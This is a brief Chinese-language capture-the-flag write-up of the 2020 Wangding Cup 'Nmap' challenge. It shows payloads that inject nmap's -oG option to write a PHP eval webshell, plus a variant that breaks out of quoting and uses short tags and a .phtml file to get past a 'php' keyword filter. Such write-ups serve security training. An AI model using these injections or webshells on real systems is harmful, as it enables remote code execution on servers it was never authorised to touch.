[网鼎杯 2020 朱雀组] Nmap

发布于 2021-08-06  66 次阅读


image-20201231194208731
image-20201231194315377

打开题目,简单尝试让我想到了,之前做过的一道题目

image-20201231194243287

利用nmap -oG写入webshell得到flag

payload<?php @eval($_POST["a"]);?> -oG hack.php

image-20201231195208910

提示hacke,怀疑过滤了关键词php

payload:127.0.0.1' <?= @eval($_POST["cdm"]);?> -oG cmd.phtml '

image-20201231202843139
image-20201231203141689